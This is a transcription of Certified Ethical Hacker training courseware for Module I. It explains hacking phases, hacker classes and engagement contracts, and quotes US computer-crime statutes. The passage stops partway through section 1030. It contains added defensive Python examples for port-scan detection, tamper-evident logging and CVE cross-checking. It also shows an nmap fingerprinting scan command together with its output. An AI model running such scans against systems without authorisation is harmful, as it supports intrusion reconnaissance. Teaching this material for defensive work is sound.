• Name
• Company Affiliation
• Title/Function
• Job Responsibility
• System security related experience
• Expectations



Course Materials

• Identity Card
• Student Courseware
• Lab Manual/Workbook
• Compact Disc
• Course Evaluation
• Reference Materials
Course Outline

• Module I: Introduction to Ethical Hacking
• Module II: Footprinting
• Module III: Scanning
• Module IV: Enumeration
• Module V: System Hacking
• Module VI: Trojans and Backdoors
• Module VII: Sniffers
• Module VIII: Denial of Service
• Module IX: Social Engineering
• Module X: Session Hijacking
• Module XI: Hacking Web Servers
• Module XII: Web Application Vulnerabilities
• Module XIII: Web Based Password Cracking Techniques
• Module XIV: SQL Injection
• Module XV: Hacking Wireless Networks
• Module XVI: Viruses
• Module XVII: Physical Security
• Module XVIII: Linux Hacking
• Module XIX: Evading IDS, Firewalls and Honeypots
• Module XX: Buffer Overflows
• Module XXI: Cryptography
• Module XXII: Penetration Testing
EC-Council Certified e-business Certification Program

There are several levels of certification tracks under the EC-Council accreditation body:

1. Certified e-Business Associate
2. Certified e-Business Professional
3. Certified e-Business Consultant
4. E++ Certified Technical Consultant
5. Certified Ethical Hacker (CEH)  <-- You are here
6. Computer Hacking Forensic Investigator (CHFI)
7. EC-Council Certified Security Analyst (ECSA)
8. EC-Council Certified Secure Programmer (ECSA)
9. Certified Secure Application Developer (CSAD)
10. Licensed Penetration Tester (LPT)
11. Master of Security Science (MSS)
EC-Council Certified Ethical Hacker

Certified Ethical Hacker Track

Complete the following steps:

1. START
2. Attend Security Training
3. Prepare for Exam 312-50
4. Take Exam (pass/fail)
5. Certification Achieved: Certified Ethical Hacker (C|EH)

Pass the following exam: Ethical Hacking and Countermeasures Exam (312-50)

[Figure: the CEH track flowchart and C|EH logo; only the step labels above were recoverable.]
Student Facilities

• Class Hours
• Building Hours
• Parking
• Restrooms
• Meals
• Phones
• Messages
• Smoking
• Recycling

• Lab Sessions are designed to reinforce the classroom sessions.
• The sessions are intended to give a hands-on experience only and do not guarantee proficiency.
Ethical Hacking

Module I: Introduction to Ethical Hacking

Module Objectives

• Understanding the importance of security
• Introducing Ethical Hacking and essential terminology for the module
• Job role of an ethical hacker: Why choose hacking as a profession?
• Ethical hacking vis-à-vis Penetration Testing
• Understanding the different phases involved in a hacking exploit
• Introducing hacking technologies
• Overview of attacks and identification of exploit categories
• Comprehending ethical hacking
• Legal implications of hacking
• Hacking, law, and punishment
Module Flow

1. The Need for Security
2. Essential Terminology
3. Elements of Security
4. Hacking Cycle
5. Malicious Hacker Act
6. Hacktivism
7. Hacker Classes
8. Computer Crimes and Implications
9. Need for Ethical Hacking
Problem Definition - Why Security?

• Evolution of technology focused on ease of use

  [Screenshot: Secunia advisory excerpt]
  Microsoft Internet Explorer Drag and Drop Vulnerability
  Secunia Advisory: SA12321
  Release Date: 2004-08-19
  Last Update: 2004-10-12
  Critical: Highly critical
  Impact: System access
  Where: From remote

• Increased networked environment and network-based applications
• Decreasing skill level needed for exploits

  [Figure: "Intruder Knowledge" falling while "Attack Sophistication" rises, plotted against a timeline through 1995 and 2000. Milestones along the curve, earliest to latest: password guessing, self-replicating code, password cracking, exploiting known vulnerabilities, disabling audits, back doors, hijacking sessions, sniffers, packet spoofing, GUI, automated probes/scans, network management diagnostics, www attacks, "stealth"/advanced scanning techniques, denial of service, staged attack, distributed attack tools, cross site scripting, burglaries.]
Problem Definition - Why Security?

• Direct impact of security breach on corporate asset base and goodwill

  [Screenshot: silicon.com article] Bookie reveals $100,000 cost of denial-of-service extortion attacks. June 11 2004, by Andy McCue. "And that's just for starters - an online betting site tells all to silicon.com..."

  "Our first attack was in November last year. We got a demand for $50,000 from an unidentified source." These are the words of a UK-based online bookmaker who has agreed to speak to silicon.com, on condition of anonymity, to reveal the full scale of the denial of service extortion threats that betting sites have been battling against for nine months.

• Increasing complexity of computer infrastructure administration and management
Essential Terminology

• Threat - An action or event that might prejudice security. A threat is a potential violation of security.

• Vulnerability - Existence of a weakness, design, or implementation error that can lead to an unexpected, undesirable event compromising the security of the system.

• Target of Evaluation - An IT system, product, or component that is identified/subjected as requiring security evaluation.

• Attack - An assault on system security that derives from an intelligent threat. An attack is any action that violates security.

• Exploit - A defined way to breach the security of an IT system through a vulnerability.
Elements of Security

• Security - A state of well-being of information and infrastructures in which the possibility of successful yet undetected theft, tampering, and disruption of information and services is kept low or tolerable.

• Security rests on confidentiality, authenticity, integrity, and availability:
  - Confidentiality - The concealment of information or resources.
  - Authenticity - The identification and assurance of the origin of information.
  - Integrity - The trustworthiness of data or resources in terms of preventing improper and unauthorized changes.
  - Availability - The ability to use the information or resource desired.

• Any hacking event will affect any one or more of the essential security elements.

EC-Council
Copyright © by EC-Council
All Rights reserved. Reproduction is strictly prohibited

The Security, Functionality, and Ease of Use Triangle

• The number of exploits gets minimized when the number of weaknesses is reduced => greater security
• Takes more effort to conduct the same task => reduced functionality
• Moving towards security means moving away from functionality and ease of use.

  [Figure: triangle with the vertices Functionality, Security, and Ease of Use.]
Case Study

WORM'S EFFECTS
- Customers of the Canadian Imperial Bank of Commerce in Toronto were unable to withdraw money using ATMs during part of Saturday.
- Korea Telecom Freetel and SK Telecom service failed, stranding millions of South Korean Internet users.
- Internet congestion prevented consumers from contacting Microsoft over the Internet to unlock the anti-piracy features of its latest products, including the Windows XP and Office XP software packages.
- The U.S. departments of State, Agriculture, Commerce and some units of the Defense Department appeared hardest hit among federal agencies.

• Alan was stranded at Newark airport. He was to attend his friend's wedding and Continental Airlines just announced the cancellation of his hop-over flight.
• He decided to purchase a seat on another airline, but the Bank of America Corp ATM just wouldn't work.
• All seemed wrong with the world as the airline staff were using pen and paper to take down new reservations. They couldn't even confirm the availability.

[Screenshot: CNN.com/Technology] Computer worm grounds flights, blocks ATMs

WASHINGTON (CNN) -- A fast-moving computer worm snarled business and government computers Saturday, slowing some corporate systems to the point of inaccessibility.
What Does a Malicious Hacker Do?

• Reconnaissance
  - Active/passive
• Scanning
• Gaining access
  - Operating system level/application level
  - Network level
  - Denial of service
• Maintaining access
  - Uploading/altering/downloading programs or data
• Clearing tracks

[Figure: the phases drawn as a cycle: 1 Reconnaissance -> 2 Scanning -> 3 Gaining Access -> 4 Maintaining Access -> 5 Clearing Tracks.]
Phase 1 - Reconnaissance

• Reconnaissance refers to the preparatory phase where an attacker seeks to gather as much information as possible about a target of evaluation prior to launching an attack.

• Business Risk: Notable - Generally noted as "rattling the door knobs" to see if someone is watching and responding.

• Could be a future point of return when noted for ease of entry for an attack when more is known on a broad scale about the target.
Reconnaissance Types

Passive reconnaissance involves acquiring information without directly interacting with the target. For example, searching public records or news releases.

Active reconnaissance involves interacting with the target directly by any means. For example, telephone calls to the help desk or technical department.
Phase 2 - Scanning

• Scanning refers to the pre-attack phase when the hacker scans the network for specific information on the basis of information gathered during reconnaissance.

• Business Risk: High - Hackers have to get a single point of entry to launch an attack.

• Scanning can include use of dialers, port scanners, network mapping, sweeping, vulnerability scanners, and so on.

[Screenshot: NMAP Scanner Front End; Command: nmap -sS -sV -O -F -PI -T4 www.insecure.org]

    Starting nmap 3.49 ( http://www.insecure.org/nmap/ ) at 2003-12-19 14:28 PST
    Interesting ports on www.insecure.org (205.217.153.53):
    (The 1212 ports scanned but not shown below are in state: filtered)
    PORT    STATE  SERVICE VERSION
    22/tcp  open   ssh     OpenSSH 3.1p1 (protocol 1.99)
    25/tcp  open   smtp    qmail smtpd
    53/tcp  open   domain  ISC Bind 9.2.1
    80/tcp  open   http    Apache httpd 2.0.39 ((Unix) mod_perl/1.99_07-dev Perl/v5.6.1)
    113/tcp closed auth
    Device type: general purpose
    Running: Linux 2.4.X|2.5.X
    OS details: Linux Kernel 2.4.0 - 2.5.20
    Uptime 212.119 days (since Wed May 21 12:35:26 2003)

    Nmap run completed -- 1 IP address (1 host up) scanned in 33.792 seconds
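The screenshot above is the scanner's view of the target. The defender's view of the same activity is a firewall log in which one source address touches many destination ports within seconds, whether or not each probe is dropped. The following detector is an added example and is not part of the courseware or of nmap: it reads constructed iptables-style lines (addresses from the RFC 5737 documentation ranges), keeps a sliding time window per source/destination pair, and raises an alert once the number of distinct ports seen in the window crosses a threshold. The line format, the 60-second window and the threshold of 10 ports are assumptions a site would tune to its own traffic.

```python
"""Detect port scans in firewall logs by counting distinct destination ports
per (source, destination) pair inside a sliding time window.
Added example, not from the courseware; log lines and addresses are constructed."""
import re
from collections import Counter, defaultdict
from datetime import datetime, timedelta

# Constructed iptables-style log lines. 198.51.100.7 sweeps 12 ports in 6 s,
# 203.0.113.5 is an ordinary web client, 198.51.100.9 touches only 3 ports,
# and the last line is malformed to show that bad input is skipped, not fatal.
SAMPLE_LOG = """\
2003-12-19 14:28:00 DROP SRC=198.51.100.7 DST=192.0.2.10 PROTO=TCP DPT=21
2003-12-19 14:28:00 DROP SRC=198.51.100.7 DST=192.0.2.10 PROTO=TCP DPT=22
2003-12-19 14:28:01 DROP SRC=198.51.100.7 DST=192.0.2.10 PROTO=TCP DPT=23
2003-12-19 14:28:01 DROP SRC=198.51.100.7 DST=192.0.2.10 PROTO=TCP DPT=25
2003-12-19 14:28:02 ACCEPT SRC=198.51.100.7 DST=192.0.2.10 PROTO=TCP DPT=53
2003-12-19 14:28:02 ACCEPT SRC=198.51.100.7 DST=192.0.2.10 PROTO=TCP DPT=80
2003-12-19 14:28:03 DROP SRC=198.51.100.7 DST=192.0.2.10 PROTO=TCP DPT=110
2003-12-19 14:28:03 DROP SRC=198.51.100.7 DST=192.0.2.10 PROTO=TCP DPT=135
2003-12-19 14:28:04 DROP SRC=198.51.100.7 DST=192.0.2.10 PROTO=TCP DPT=139
2003-12-19 14:28:04 DROP SRC=198.51.100.7 DST=192.0.2.10 PROTO=TCP DPT=143
2003-12-19 14:28:05 ACCEPT SRC=198.51.100.7 DST=192.0.2.10 PROTO=TCP DPT=443
2003-12-19 14:28:05 DROP SRC=198.51.100.7 DST=192.0.2.10 PROTO=TCP DPT=445
2003-12-19 14:28:06 ACCEPT SRC=203.0.113.5 DST=192.0.2.10 PROTO=TCP DPT=80
2003-12-19 14:28:07 ACCEPT SRC=203.0.113.5 DST=192.0.2.10 PROTO=TCP DPT=443
2003-12-19 14:28:08 ACCEPT SRC=203.0.113.5 DST=192.0.2.10 PROTO=TCP DPT=80
2003-12-19 14:30:00 DROP SRC=198.51.100.9 DST=192.0.2.10 PROTO=TCP DPT=1433
2003-12-19 14:30:01 DROP SRC=198.51.100.9 DST=192.0.2.10 PROTO=TCP DPT=3306
2003-12-19 14:30:02 DROP SRC=198.51.100.9 DST=192.0.2.10 PROTO=TCP DPT=3389
not a log line at all
"""

# Assumed line layout; a real deployment would match its own firewall's format.
LINE_RE = re.compile(
    r"^(?P<ts>\d{4}-\d{2}-\d{2} \d{2}:\d{2}:\d{2}) (?P<action>ACCEPT|DROP) "
    r"SRC=(?P<src>\S+) DST=(?P<dst>\S+) PROTO=(?P<proto>\S+) DPT=(?P<dpt>\d+)$"
)


def parse_line(line):
    """Return a record dict for a well-formed line, or None if it does not match."""
    m = LINE_RE.match(line.strip())
    if not m:
        return None
    rec = m.groupdict()
    rec["ts"] = datetime.strptime(rec["ts"], "%Y-%m-%d %H:%M:%S")
    rec["dpt"] = int(rec["dpt"])
    return rec


def detect_port_scans(lines, threshold=10, window=timedelta(seconds=60)):
    """Alert on each (src, dst) pair that reaches `threshold` distinct destination
    ports within any span of length `window`. Returns a list of alert dicts."""
    events = defaultdict(list)  # (src, dst) -> [(timestamp, port), ...]
    for line in lines:
        rec = parse_line(line)
        if rec is not None:
            events[(rec["src"], rec["dst"])].append((rec["ts"], rec["dpt"]))

    alerts = []
    for (src, dst), evs in events.items():
        evs.sort()
        in_window = Counter()  # port -> number of hits currently inside the window
        left = 0
        for ts, dpt in evs:
            in_window[dpt] += 1
            # Advance the left edge until every counted event is within `window`.
            while ts - evs[left][0] > window:
                old_port = evs[left][1]
                in_window[old_port] -= 1
                if in_window[old_port] == 0:
                    del in_window[old_port]
                left += 1
            if len(in_window) >= threshold:
                alerts.append({
                    "src": src, "dst": dst,
                    "distinct_ports": sorted(in_window),
                    "first": evs[left][0], "last": ts,
                })
                break  # one alert per pair is enough for this demonstration
    return alerts


if __name__ == "__main__":
    for a in detect_port_scans(SAMPLE_LOG.splitlines()):
        print(f"{a['src']} -> {a['dst']}: {len(a['distinct_ports'])} ports "
              f"between {a['first']:%H:%M:%S} and {a['last']:%H:%M:%S}")
```

With the defaults only the sweeping host is flagged; lowering the threshold to 3 also catches the host that probed three database ports, which shows why the threshold has to be chosen against the site's normal traffic rather than fixed once. Counting distinct ports rather than raw hits is what keeps the ordinary web client, which hits port 80 repeatedly, out of the alert list.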
Phase 3 - Gaining Access

• Gaining Access refers to the penetration phase. The hacker exploits the vulnerability in the system.

• The exploit can occur over a LAN, the Internet, or as a deception or theft. Examples include buffer overflows, denial of service, session hijacking, and password cracking.

• Influencing factors include architecture and configuration of the target system, the skill level of the perpetrator, and the initial level of access obtained.

• Business Risk: Highest - The hacker can gain access at the operating system level, application level, or network level.
Phase 4 - Maintaining Access

• Maintaining Access refers to the phase when the hacker tries to retain his ownership of the system.

• The hacker has compromised the system.

• Hackers may harden the system from other hackers as well (to own the system) by securing their exclusive access with Backdoors, RootKits, or Trojans.

• Hackers can upload, download, or manipulate data, applications, and configurations on the owned system.
Phase 5 - Covering Tracks

• Covering Tracks refers to the activities undertaken by the hacker to hide his misdeeds.

• Reasons include the need for prolonged stay, continued use of resources, removing evidence of hacking, or avoiding legal action.

• Examples include Steganography, tunneling, and altering log files.
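Of the three examples, altering log files is the one a defender can design against in advance: if every log record carries a keyed hash that also covers the previous record's hash, an edited record, a deleted record and a silently cut-off tail can each be recognised afterwards. The code below is an added example, not part of the courseware; the key, the auth-log style entries and the three tampering scenarios are constructed, and the scheme assumes the key and the most recent tag (the anchor) are held on a separate log collector rather than on the logged host. It goes slightly beyond the slide by also showing the one case a plain hash chain misses: truncation checked without an anchor passes.

```python
"""Tamper-evident log with an HMAC hash chain: detects edited, deleted and
truncated records after the fact. Added example, not part of the courseware;
the key, log entries and tampering scenarios are constructed."""
import hashlib
import hmac
import json

# Constructed key. In a real deployment the key and the latest tag (anchor)
# live on a separate collector, so whoever edits the log on the host cannot
# simply recompute a consistent chain.
LOG_KEY = b"constructed-demo-key-do-not-reuse"
GENESIS = "0" * 64  # tag assumed to precede the first record

# Constructed auth-log style entries.
SAMPLE_ENTRIES = [
    "14:28:00 sshd: Accepted publickey for ops from 203.0.113.5",
    "14:31:12 sshd: Failed password for root from 198.51.100.7",
    "14:31:15 sshd: Failed password for root from 198.51.100.7",
    "14:31:19 sshd: Accepted password for root from 198.51.100.7",
    "14:32:40 sudo: root : COMMAND=/usr/bin/vi /var/log/auth.log",
]


def chain_tag(prev_tag, entry, key=LOG_KEY):
    """tag = HMAC-SHA256(key, previous tag || entry): each record binds its predecessor."""
    msg = prev_tag.encode() + b"\n" + entry.encode()
    return hmac.new(key, msg, hashlib.sha256).hexdigest()


def append_entry(log, entry, key=LOG_KEY):
    """Append a record and return its tag, which becomes the new chain anchor."""
    prev = log[-1]["tag"] if log else GENESIS
    log.append({"entry": entry, "tag": chain_tag(prev, entry, key)})
    return log[-1]["tag"]


def verify_chain(log, anchor=None, key=LOG_KEY):
    """Return (True, None) if every record re-verifies and, when an anchor is
    given, the last tag equals it; otherwise (False, index of the first failure).
    Without an anchor, records cut off the end of the log are NOT detected."""
    prev = GENESIS
    for i, rec in enumerate(log):
        if not hmac.compare_digest(chain_tag(prev, rec["entry"], key), rec["tag"]):
            return False, i
        prev = rec["tag"]
    if anchor is not None and not hmac.compare_digest(prev, anchor):
        return False, len(log)
    return True, None


def build_sample_log():
    """Write the constructed entries into a fresh chain; return (log, anchor)."""
    log, anchor = [], GENESIS
    for entry in SAMPLE_ENTRIES:
        anchor = append_entry(log, entry)
    return log, anchor


def tamper(log, how):
    """Return a modified copy: one record edited, one removed, or the tail cut."""
    copy = json.loads(json.dumps(log))
    if how == "edit":
        copy[3]["entry"] = copy[3]["entry"].replace("Accepted", "Failed")
    elif how == "delete":
        del copy[3]
    elif how == "truncate":
        del copy[3:]
    else:
        raise ValueError(how)
    return copy


def audit():
    """Run the checks an auditor would run and collect the verdicts."""
    log, anchor = build_sample_log()
    results = {"intact": verify_chain(log, anchor)}
    for how in ("edit", "delete", "truncate"):
        results[how] = verify_chain(tamper(log, how), anchor)
    # The same truncation verified without the external anchor passes silently.
    results["truncate_no_anchor"] = verify_chain(tamper(log, "truncate"))
    return results


if __name__ == "__main__":
    for name, verdict in audit().items():
        print(f"{name:20s} -> {verdict}")
```

The index returned on failure is where an investigator starts reading: for the edited and deleted cases it points at the first record whose tag no longer follows from its predecessor, and for truncation with an anchor it equals the surviving length, telling the auditor how many records were kept.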
Hacktivism

• Refers to the idea of hacking with or for a cause.

• Comprises hackers with a social or political agenda.

• Aims at sending a message through their hacking activity and gaining visibility for their cause and themselves.

• Common targets include government agencies, MNCs, or any other entity perceived as bad or wrong by these groups or individuals.

• It remains a fact, however, that gaining unauthorized access is a crime, no matter what the intent.
Hacker Classes

Black Hats - Individuals with extraordinary computing skills, resorting to malicious or destructive activities. Also known as crackers.

Gray Hats - Individuals who work both offensively and defensively at various times.

White Hats - Individuals professing hacker skills and using them for defensive purposes. Also known as security analysts.
Ethical Hacker Classes

• Former Black Hats
  - Reformed crackers
  - First-hand experience
  - Lesser credibility perceived

• White Hats
  - Independent security consultants (may be groups as well)
  - Claim to be knowledgeable about black hat activities

• Consulting Firms
  - Part of ICT firms
  - Good credentials
What Do Ethical Hackers Do?

• "If you know the enemy and know yourself, you need not fear the result of a hundred battles."
  - Sun Tzu, Art of War

Ethical hackers try to answer the following questions:
- What can the intruder see on the target system? (Reconnaissance and Scanning phases)
- What can an intruder do with that information? (Gaining Access and Maintaining Access phases)
- Does anyone at the target notice the intruders' attempts or successes? (Reconnaissance and Covering Tracks phases)

• If hired by any organization, an ethical hacker asks the organization what it is trying to protect, against whom, and what resources it is willing to expend in order to gain protection.
Can Hacking Be Ethical?

• Hacker refers to a person who enjoys learning the details of computer systems and how to stretch their capabilities.

• Hacking describes the rapid development of new programs or the reverse engineering of already existing software to make the code better and more efficient.

• Cracker refers to a person who uses his hacking skills for offensive purposes.

• Ethical hacker refers to security professionals who apply their hacking skills for defensive purposes.
How to Become an Ethical Hacker

To become an ethical hacker you must meet the following requirements:

• Should be proficient with programming and computer networking skills
• Should be familiar with vulnerability research
• Should have mastery in different hacking techniques
• Should be prepared to follow a strict code of conduct
Skill Profile of an Ethical Hacker

• A computer expert adept at technical domains.
• Has in-depth knowledge of target platforms, such as Windows, Unix, and Linux.
• Has exemplary knowledge of networking and related hardware and software.
• Knowledgeable about security areas and related issues.
What is Vulnerability Research?

• Discovering vulnerabilities and design weaknesses that will open an operating system and its applications to attack or misuse.

• Includes both dynamic study of products and technologies and ongoing assessment of the hacking underground.

• Relevant innovations are released in the form of alerts and are delivered within product improvements for security systems.

• Can be classified based on:
  - Severity level (low, medium, or high)
  - Exploit range (local or remote)
Why Hackers Need Vulnerability Research

• To identify and correct network vulnerabilities
• To protect the network from being attacked by intruders
• To get information that helps prevent security problems
• To gather information about viruses
• To find weaknesses in the network and to alert the network administrator before a network attack
• To know how to recover from a network attack
Vulnerability Research Tools

US-CERT publishes information regarding a variety of vulnerabilities in "US-CERT Vulnerability Notes":

• Similar to alerts but contain less information
• Does not contain the solutions to all the vulnerabilities
• Contains vulnerabilities that meet certain criteria
• Contains information that is useful to the administrator
• Vulnerability notes can be searched by several key fields: name, vulnerability ID number, and CVE-name
• Can be cross checked with the Common Vulnerabilities and Exposures (CVE) catalog
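The two slides above describe the same working set from two sides: vulnerability notes are classified by severity level and exploit range, and they are looked up by name, note ID or CVE name and cross-checked against the CVE catalog. The following code is an added example, not part of the courseware or of US-CERT's or MITRE's tooling: it models a handful of constructed notes (the VU#-style IDs and CVE names with year 0000 are deliberate placeholders), validates CVE name syntax, filters on the fields the slide names, and partitions the notes into matched, unmatched, missing-CVE and malformed-CVE groups so that a note with a broken reference is reported rather than silently dropped.

```python
"""Search and cross-check of vulnerability notes against a CVE catalog.
Added example, not from the courseware; all notes, IDs and catalog entries
are constructed (year 0000 CVE names are placeholders, not real CVEs)."""
import re
from dataclasses import dataclass
from typing import Optional

CVE_RE = re.compile(r"^CVE-\d{4}-\d{4,}$")  # CVE name syntax: CVE-YYYY-NNNN, 4+ digits
SEVERITIES = ("low", "medium", "high")       # severity levels named on the slide
RANGES = ("local", "remote")                 # exploit ranges named on the slide


@dataclass(frozen=True)
class VulnNote:
    note_id: str
    name: str
    cve: Optional[str]
    severity: str
    exploit_range: str

    def __post_init__(self):
        # Reject a note whose classification is outside the slide's two scales.
        if self.severity not in SEVERITIES:
            raise ValueError(f"{self.note_id}: bad severity {self.severity!r}")
        if self.exploit_range not in RANGES:
            raise ValueError(f"{self.note_id}: bad exploit range {self.exploit_range!r}")


# Constructed notes. VU#000005 carries a malformed CVE name on purpose.
NOTES = [
    VulnNote("VU#000001", "Browser drag-and-drop file placement", "CVE-0000-0001", "high", "remote"),
    VulnNote("VU#000002", "Mail server buffer overflow in SMTP banner", "CVE-0000-0002", "high", "remote"),
    VulnNote("VU#000003", "Setuid helper follows symlinks", "CVE-0000-0003", "medium", "local"),
    VulnNote("VU#000004", "Verbose error page leaks install path", None, "low", "remote"),
    VulnNote("VU#000005", "Kernel driver ioctl integer overflow", "cve-0000-5", "high", "local"),
]

# Constructed CVE catalog: name -> short description.
CVE_CATALOG = {
    "CVE-0000-0001": "drag-and-drop allows placing files in a startup folder",
    "CVE-0000-0002": "SMTP banner overflow",
    "CVE-0000-0004": "catalog entry with no corresponding note",
}


def is_valid_cve_id(cve: Optional[str]) -> bool:
    """True only for a well-formed CVE name (upper case, 4-digit year, 4+ digit sequence)."""
    return bool(cve) and CVE_RE.match(cve) is not None


def search(notes, *, severity=None, exploit_range=None, cve=None, text=None):
    """Filter notes by the key fields the slide lists; returns matching note IDs."""
    hits = []
    for n in notes:
        if severity and n.severity != severity:
            continue
        if exploit_range and n.exploit_range != exploit_range:
            continue
        if cve and n.cve != cve:
            continue
        if text and text.lower() not in n.name.lower():
            continue
        hits.append(n.note_id)
    return hits


def cross_check(notes, catalog):
    """Partition notes by whether their CVE name resolves in the catalog.
    Notes without a CVE or with a malformed one are reported in their own
    groups so an administrator can see which references need repair."""
    result = {"matched": [], "unmatched": [], "no_cve": [], "malformed": []}
    for n in notes:
        if n.cve is None:
            result["no_cve"].append(n.note_id)
        elif not is_valid_cve_id(n.cve):
            result["malformed"].append(n.note_id)
        elif n.cve in catalog:
            result["matched"].append(n.note_id)
        else:
            result["unmatched"].append(n.note_id)
    return result


if __name__ == "__main__":
    print("high/remote:", search(NOTES, severity="high", exploit_range="remote"))
    print("cross-check:", cross_check(NOTES, CVE_CATALOG))
```

The "unmatched" group is the interesting one operationally: a note that names a CVE the catalog does not know is either ahead of the catalog or mistyped, and either way it should be looked at rather than assumed to be covered.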
Vulnerability Research Websites

• www.windowsfocus.com
• www.security.com
• www.securitytracker.com
• www.microsoft.com/security

[Screenshot: windowsfocus.com opened in Internet Explorer. At the time of capture the address redirected to a Sedo domain-parking page ("This domain may be for sale by its owner!") filled with sponsored links for window replacement, so the first site listed above was no longer serving security content.]
How Do They Go About It?

• Any security evaluation involves three components:

Preparation - In this phase, a formal contract is signed that contains a non-disclosure clause as well as a legal clause to protect the ethical hacker against any prosecution that might otherwise attract during the conduct phase. The contract also outlines infrastructure perimeter, evaluation activities, time schedules, and resources available to him.

Conduct - In this phase, the evaluation technical report is prepared based on testing potential vulnerabilities.

Conclusion - In this phase, the results of the evaluation are communicated to the organization or sponsors and corrective action is taken if needed.
Modes of Ethical Hacking

• Remote network - This approach attempts to simulate an intruder launching an attack over the Internet.

• Remote dial-up network - This approach attempts to simulate an intruder launching an attack against the client's modem pools.

• Local network - This approach simulates an employee with legal access gaining unauthorized access over the local network.

• Stolen equipment - This approach simulates theft of a critical information resource, such as a laptop owned by a strategist that was taken from its owner and given to the ethical hacker.

• Social engineering - This approach attempts to check the integrity of the organization's employees.

• Physical entry - This approach attempts to physically compromise the organization's ICT infrastructure.
Ethical Hacking Testing

• There are many different forms of security testing. Examples include vulnerability scanning, ethical hacking, and penetration testing.

• Approaches to testing are shown below.
  - Black box - With no prior knowledge of the infrastructure to be tested.
  - White box - With a complete knowledge of the network infrastructure.
  - Gray box - Also known as Internal Testing. Examines the extent of access by insiders within the network.
Ethical Hacking Deliverables

An Ethical Hacking Report:

• Details the results of the hacking activity, matching it against the work schedule decided prior to the conduct phase.

• Vulnerabilities are detailed and avoidance measures suggested. Usually delivered in hard copy format for security reasons.

• Issues to consider - Nondisclosure clause in the legal contract (availing the right information to the right person), integrity of the evaluation team, sensitivity of information.
Computer Crimes and Implications

[Screenshot: http://cybercrime.gov/ in Internet Explorer]
WWW.CYBERCRIME.GOV
Computer Crime and Intellectual Property Section (CCIPS) of the Criminal Division of the U.S. Department of Justice

Computer Crime (e.g., hacking): Policy, Cases, Guidance, Laws, Documents
Intellectual Property Crime: Policy, Cases, Guidance, Laws, Economic Espionage, Documents
Cybercrime Documents: Press Releases, Speeches, Testimony, Letters, Reports, Manuals
Cyberethics Information: Parent or Teacher, Kids, Related Web Sites
Computer Crimes and Implications

• The Cyber Security Enhancement Act of 2002 mandates life sentences for hackers who recklessly endanger the lives of others.

• The CSI/FBI 2002 Computer Crime and Security Survey noted that 90 percent of respondents acknowledged security breaches, but only 34 percent reported the crimes to law enforcement agencies.

• The FBI computer crimes squad estimates that between 85 and 97 percent of computer intrusions are not even detected.
Legal Perspective (U.S. Federal Law)

Federal Criminal Code Related to Computer Crime:

• 18 U.S.C. § 1029. Fraud and Related Activity in Connection with Access Devices
• 18 U.S.C. § 1030. Fraud and Related Activity in Connection with Computers
• 18 U.S.C. § 1362. Communication Lines, Stations, or Systems
• 18 U.S.C. § 2510 et seq. Wire and Electronic Communications Interception and Interception of Oral Communications
• 18 U.S.C. § 2701 et seq. Stored Wire and Electronic Communications and Transactional Records Access
Section 1029

Subsection (a) Whoever--

(1) knowingly and with intent to defraud produces, uses, or traffics in one or more counterfeit access devices;

(2) knowingly and with intent to defraud traffics in or uses one or more unauthorized access devices during any one-year period, and by such conduct obtains anything of value aggregating $1,000 or more during that period;

(3) knowingly and with intent to defraud possesses fifteen or more devices which are counterfeit or unauthorized access devices;

(4) knowingly, and with intent to defraud, produces, traffics in, has control or custody of, or possesses device-making equipment;
Section 1029 (continued)

(5) knowingly and with intent to defraud effects transactions, with 1 or more access devices issued to another person or persons, to receive payment or any other thing of value during any 1-year period the aggregate value of which is equal to or greater than $1,000;

(6) without the authorization of the issuer of the access device, knowingly and with intent to defraud solicits a person for the purpose of--

(A) offering an access device; or

(B) selling information regarding or an application to obtain an access device;

(7) knowingly and with intent to defraud uses, produces, traffics in, has control or custody of, or possesses a telecommunications instrument that has been modified or altered to obtain unauthorized use of telecommunications services;
Section 1029 (continued)

(8) knowingly and with intent to defraud uses, produces, traffics in, has control or custody of, or possesses a scanning receiver;

(9) knowingly uses, produces, traffics in, has control or custody of, or possesses hardware or software, knowing it has been configured to insert or modify telecommunication identifying information associated with or contained in a telecommunications instrument so that such instrument may be used to obtain telecommunications service without authorization; or

(10) without the authorization of the credit card system member or its agent, knowingly and with intent to defraud causes or arranges for another person to present to the member or its agent, for payment, 1 or more evidences or records of transactions made by an access device.
Penalties

(A) in the case of an offense that does not occur after a conviction for another offense under this section--

• (i) if the offense is under paragraph (1), (2), (3), (6), (7), or (10) of subsection (a), a fine under this title or imprisonment for not more than 10 years, or both; and

• (ii) if the offense is under paragraph (4), (5), (8), or (9) of subsection (a), a fine under this title or imprisonment for not more than 15 years, or both;

(B) in the case of an offense that occurs after a conviction for another offense under this section, a fine under this title or imprisonment for not more than 20 years, or both; and

(C) in either case, forfeiture to the United States of any personal property used or intended to be used to commit the offense.
Section 1030 - (a)(1)

Subsection (a) Whoever--

(1) having knowingly accessed a computer without authorization or exceeding authorized access, and by means of such conduct having obtained information that has been determined by the United States Government pursuant to an Executive order or statute to require protection against unauthorized disclosure for reasons of national defense or foreign relations, or any restricted data, as defined in paragraph y of section 11 of the Atomic Energy Act of 1954, with reason to believe that such information so obtained could be used to the injury of the United States, or to the advantage of any foreign nation willfully communicates, delivers, transmits, or causes to be communicated, delivered, or transmitted, or attempts to communicate, deliver, transmit or cause to be communicated, delivered, or transmitted the same to any person not entitled to receive it, or willfully retains the same and fails to deliver it to the officer or employee of the United States entitled to receive it;
Section 1030 (2) (A) (B) (C)

(2) intentionally accesses a computer without authorization or exceeds authorized access, and thereby obtains--

(A) information contained in a financial record of a financial institution, or of a card issuer as defined in section 1602(n) of title 15, or contained in a file of a consumer reporting agency on a consumer, as such terms are defined in the Fair Credit Reporting Act (15 U.S.C. 1681 et seq.);

(B) information from any department or agency of the United States; or

(C) information from any protected computer if the conduct involved an interstate or foreign communication;
Section 1030 (3) (4)

(3) intentionally, without authorization to access any nonpublic computer of a department or agency of the United States, accesses such a computer of that department or agency that is exclusively for the use of the Government of the United States or, in the case of a computer not exclusively for such use, is used by or for the Government of the United States and such conduct affects that use by or for the Government of the United States;

(4) knowingly and with intent to defraud, accesses a protected computer without authorization, or exceeds authorized access, and by means of such conduct furthers the intended fraud and obtains anything of value, unless the object of the fraud and the thing obtained consists only of the use of the computer and the value of such use is not more than $5,000 in any 1-year period;
Section 1030 (5) (A) (B)

(5)(A)(i) knowingly causes the transmission of a program, information, code, or command, and as a result of such conduct, intentionally causes damage without authorization, to a protected computer;

(ii) intentionally accesses a protected computer without authorization, and as a result of such conduct, recklessly causes damage; or

(iii) intentionally accesses a protected computer without authorization, and as a result of such conduct, causes damage; and

